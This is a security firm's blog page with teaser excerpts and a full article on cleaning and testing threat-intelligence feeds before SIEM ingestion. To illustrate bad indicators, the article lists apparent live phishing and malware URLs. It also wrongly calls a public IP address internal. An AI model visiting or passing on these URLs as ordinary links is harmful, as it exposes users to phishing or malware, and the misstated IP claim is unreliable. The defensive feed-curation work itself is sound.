Blog

by mrahier96 mrahier96 No Comments

Dnssecuritytxt: new security best practice or impractical good idea

If you are casually browsing for ways to improve your cyber security posture, you might not have come across dnssecuritytxt, and it’s understandable because it’s not very famous. But we took a look at it and wanted to share our opinion with you.

Security.txt and dnssecuritytxt

A few years ago, a concept called security.txt became popular in the online community after giants such as Google, Facebook or Dropbox started implementing it. This concept was nothing more than a .txt file that was placed in the /.well-known/ directory of a website. Its contents? Information about who to contact in case a bug is found, what the security policy of the company is, how to encrypt the proof of vulnerabilities before sending them over, and even a job page for those who might be interested. You can read this great article which goes more into the details of security.txt or you can visit our implementation of it to see what it looks like from the URL below:

Read more

by mrahier96 mrahier96 No Comments

From Log4Shell to Text4Shell…

Context of the Log4Shell Vulnerability to Text4Shell

A year ago, the infamous “Log4Shell” vulnerability on the Log4J logging library of the Apache Logging Services was disclosed. This “Remote Code Execution” (RCE) vulnerability was widely publicized, as the component was widely used and exploiting of the vulnerability was easy. Indeed, Log4Shell was more than just an RCE vulnerability. Depending on the way it was exploited, it could also be used for data exfiltration via protocols such as DNS.

Read more

by mrahier96 mrahier96 No Comments

Manage your vulnerabilities through a Risk-based approach

The number of vulnerabilities is growing day by day due to different technologies such Web applications or Cloud Computing, which is increasingly adopted by organizations as well as teleworking, so more assets are exposed and connected to the internet and the attack surface of organizations is getting more and more larger, besides hackers have shifted their focus from high to medium and low CVSS.

Read more

by mrahier96 mrahier96 No Comments

Traffic Light Protocol (TLP) had a change of colours

A word on FIRST

FIRST is the Forum of Incident Response and Security Teams. Since 1990, when FIRST was founded, its members have resolved an almost continuous stream of security-related attacks and incidents including handling thousands of security vulnerabilities affecting nearly all of the millions of computer systems and networks throughout the world connected by the ever growing Internet.

FIRST brings together a wide variety of security and incident response teams including especially product security teams from the government, commercial, and academic sectors.

TLP means Traffic Light Protocol, it is a protocol created by the Special Interest Group of FIRST (FIRST TLP SIG).

TLP means Traffic Light Protocol, it is a protocol created by the Special Interest Group of FIRST (FIRST TLP SIG).

Read more

by mrahier96 mrahier96 No Comments

Agile threat modeling and the “the devil is in the details” idiom

Disclaimer

This post is based on the following elements:

    1. My experience working as a developer (2003-2015) and then as a full-time Application Security Consultant (2015-present).
    2. The collection of trainings I have recently followed about Threat Modeling activity.
    3. My regular technical survey on the Application Security field.

📢 Therefore, it is quite possible that my point of view is wrong in some aspect or biased. In this case, I will be more than happy to get feedback to make my point of view evolve.

Read more

by mrahier96 mrahier96 No Comments

The Principle of Least Privilege | What & How to manage, control and monitor it ?

Today’s Context about Covid and Teleworking. How is it going ?

Remote working is here to stay, requiring companies to maintain their efforts to combat cyber-attacks. Companies are now requesting security solutions to accommodate this new level of flexibility. To adapt to a changing world, some are embracing to hybrid work, while others are opting for full-time telecommuting. The goal is the same: to transparently improve workers’ working conditions regardless of their location.

If having unrestricted access to a customer’s IT assets is an integral part of a service provider’s business, it leaves them vulnerable. By offering comprehensive PAM solutions, distributors will be able to secure, manage and monitor access to their own and their customers’ privileged accounts, keeping their network’s most valuable keys safe.

Read more

by mrahier96 mrahier96 No Comments

Web ASseMbly : how to understand, debug and mess with it

Introduction

The goal of this post is to provide basics of Web Assessmbly (abbreviated “Wasm”), so the next time you encounter it, you will be able to understand it and test it.

I will not cover all the available instructions as documentation exists for that (see a bit below), but I will try to give you the keys to understand any Wasm code.

Documentation

The documentation for all the instructions in Wasm is available here: https://github.com/sunfishcode/wasm-reference-manual/blob/master/WebAssembly.md

Moreover, a good picture of how to write Wasm code can be found here:
https://learnxinyminutes.com/docs/wasm/

If there is documentation, why this post?

It’s simple:

  • Not everybody has basics on how to read assembly code and the tools to handle Wasm are not numerous
  • The mentioned documentation (which is the official one) is, in my opinion, not the most comprehensive one.

So the goal is to address these two points.
Read more

by mrahier96 mrahier96 No Comments

What is Format Preserving Encryption (FPE) ?

Format Preserving Encryption, named FPE from here, is a particular form of encryption with a constraint of preserving the initial format. In other words, the output should keep the same format as the input. The format of data can be defined by a charset (named the domain in the article below) and a length. Here are some examples:

  • A 16-digit card number in a 16-digit number.
  • A 12 Hexadecimal digit mac address in a 12 Hex digit number.
  • A mail address to another mail address.

Read more

by Excellium SA Excellium SA No Comments

Cyber threat intelligence feeds: the background

In today’s article, we discuss the background of threat intelligence feeds.

Cyber Threat Intelligence (CTI) is stream-based detection of cyber threats, including network anomaly indicators. But this is just the tip of the CTI iceberg, the one consumed by SIEM (Security Information and Event Management) appliances.

It is essential to understand the need to prepare or curate CTI.

At CERT-XLM, we actively refine our CTI feeds. This paper discusses the importance of having usable feeds and how CERT-XLM achieves this..

Cyber threat intelligence - illustration with a brain

What is a cyber threat intelligence feed?

Intelligence feeds contain indicators related to an identified or possible threat. CTI indicators are called IoCs (Indicator of Compromise) or IoAs (Indicators of Attack). An IoC is an indicator of a network security breach. They are used to identify malware signatures, known IP addresses or domains, and exploitation of vulnerable products/versions to reactively detect the compromise. An IoA recognizes the intention of attackers as well as suspicious activities that could lead to attacker persistence or lateral movements.

Indicators can be an IP address related to delivering malware, IP addresses corresponding to an attacker’s control servers (hereafter referred to as “C2”), URLs of phishing web pages, names or hashes of malicious files, email addresses, and so on.

 

Where to get your own cyber threat intelligence feed?

The market for CTI intelligence sources is not consistent. Security solutions such as anti-virus, firewalls, or proxy solutions can include proprietary CTI.

Virus Total [VT], Vx-underground [VX], or Abuse.ch [Abuse.ch] are open or public CTI sources that allow the downloading of a variety of samples or IOCs. These platforms are sometimes crowd-sourced with URLs or files submitted by users worldwide.

Platforms such as PhishTank [PhishTank] or OpenPhish [OpenPhish] allow users to report malicious sites that seek to extract user credentials or other sensitive information.

You can create your own CTI platform, which gathers and stores feeds that are relevant to you; this is what CERT-XLM does.

Some feeds are dedicated to one threat, such as OpenPhish for phishing or a particular family of malware for Abuse.ch. In contrast, others offer a wide variety of known threats, such as Malware Information Sharing Platform (MISP).

“Label all the things!”

The name of a threat is essential information for an analyst. There is no universal CTI naming convention, and each major vendor applies its own. For example, “Emotet” can be found under the name “Feodo,” “Heodo,” or “Geodo .”The Stealer “Pony” may be labelled “Siplog” or “Fareit”. QakBot  is also called “Pinkslipbot,” “QBot,” and “Quakbot.”

There are common categories for indicators like “C2”, “phishing”, “malware”, “RAT”, “ransomware”, “scanner”, and “botnet”. Unfortunately, the categories are not universal. The MISP community platform has the concept of “galaxies”,, which each member can define. The result is multiple indicators associated with the same threat.

The CERT-XLM uniformly labels all threats based on MISP classification standards. Our curated CTI is then applied consistently through SIEM Use Cases.

 

Don’t lose control over your Cyber Threat Intelligence Feeds

Low-quality CTI feeds result in low-quality indicators.

Here is an example of a low-quality CTI indicator due to URL formatting issues:

  • “http://${ip}:${port}/”
  • “http://ttp://avorlen.xyz”
  • “htttp://188.124.36.242:25802/”

 

Here is an example of a low-quality CTI indicator due to a content issue as it contains an RFC 1918 reserved IP address:

Here is an example of a low-quality CTI indicator based on being too specific. The indicator should not include the email address as this will vary based on the targeted user.

  • “https://makeyouhappymg.ru.com/20?s3=ngo3g&s1=ppp11&email=valentino@acme.com

You have to sanitize CTI indicators. Sanitizing CTI content protects your team from accidentally detonating malware. Here is an example:

  • http://%D0%B2%D0%BE%D0%B4%D0%B0.net/kE9_6iaxBF_WWLBR8Mxnu
    • the domain is not valid as is, it is actually decoded as “вода,” a valid domain, but it will have to be encoded in its internationalized form “xn--80adg3b” for a SIEM.
  • https://viro(.)mleydier(.)en
    • On line 2, the domain is protected by brackets, a common practice but left to individual preferences: one can also find square brackets instead, “hxxp” for “HTTP”.

CERT-XLM thoroughly tests, decodes, reencodes each indicator, and cleans and discards irrelevant ones.

 

Come on and grab your own!

Generic CTI content can result in the high volume creation of false positives.

Looking at the four examples below:

  • “http://firebasestorage.googleapis.com”
  • This example is a well-known content hosting service. This service can be abused, but without the exact page qualification path, the domain itself is not malicious.
  • “https://forms.office.com/r/”
    • It is common for attackers to use free online services to host malicious documents. They then invite their victims to download and open them as part of a phishing campaign to avoid detection. Without the identifier (e.g., hxxps://forms.office.com/r/ne89GVwrYE), this is not an indicator of a threat.
  • “172.67.138.4”
    • is an internal IP address. It corresponds to countless domains: Not all of these domains are malicious, and the analyst doing reverse DNS research on it must be able to classify the alert.
  • http://p”
    • is a less common example. This CTI content will generate a lot of alerts in most environments.

CERT-XLM takes extra precautions to avoid CTI content that generates a high volume of false positive alerts.

 

Adapting your cyber threat intelligence feed to your SIEMs capabilities

It is important to have Secure Socket Layer (SSL) decryption as part of your security architecture. Your SIEM will have less useful information if you do not have adequate SSL decryption. Only the visited domains will be recorded.

Your SIEM may also have software limitations. The first limitation could be the number of indicators it can ingest at one time. Other limitations will come from the functionalities of the SIEM, as none of them is perfect.

Unfortunately for some SIEMs, no alert will be raised with a visit to the URL https://walletsdappvalidation.com/ when the indicator is “https://walletsdappvalidation.com/?u” as only exact matches are possible.

 

Test, test and test again

It is essential to validate your CTI content.

CERT-XLM measures CTI content in an isolated environment to reduce the risk of incidents from establishing connections with the indicators.

We then evaluate:

  • how redundant the indicators are with the flows we already have. Measuring indicator matches things being blocked by your firewalls, proxies, anti-viruses, and other perimeter security solutions in your environment.
  • What proportion of these indicators will generate false positives? This can be measured offline by looking for the indicators in the extraction of your traffic.
  • How much reprocessing is required before ingestion by the SIEM? If there is no SSL termination in your traffic, at a minimum, you will need to extract domains from URLs. You will need to think of strategies to counter false positives as described above. Reprocessing will also involve cleaning up some of the recoverable indicators as described in Section 2.2.
  • What is the proportion of waste? This involves looking for unusable indicators, as described in paragraph 3, to which you can add those that generate false positives.

Only these quantifiable answers will allow you to conclude whether the feed is worthwhile.

CERT-XLM also recommends the use of a passive DNS database. This approach can allow extended searches to be performed without consuming DSIEM resources. If matches are identified, a short period search in the SIEM will allow concluding with the full indicator if it is a false-positive or true-positive.

Cyber threat intelligence feeds: what to conclude?

There are a lot of details to keep in mind when integrating CTI content with a SIEM. This is why CERT-XLM recommends applying a structured approach to curating CTI content.

 

Top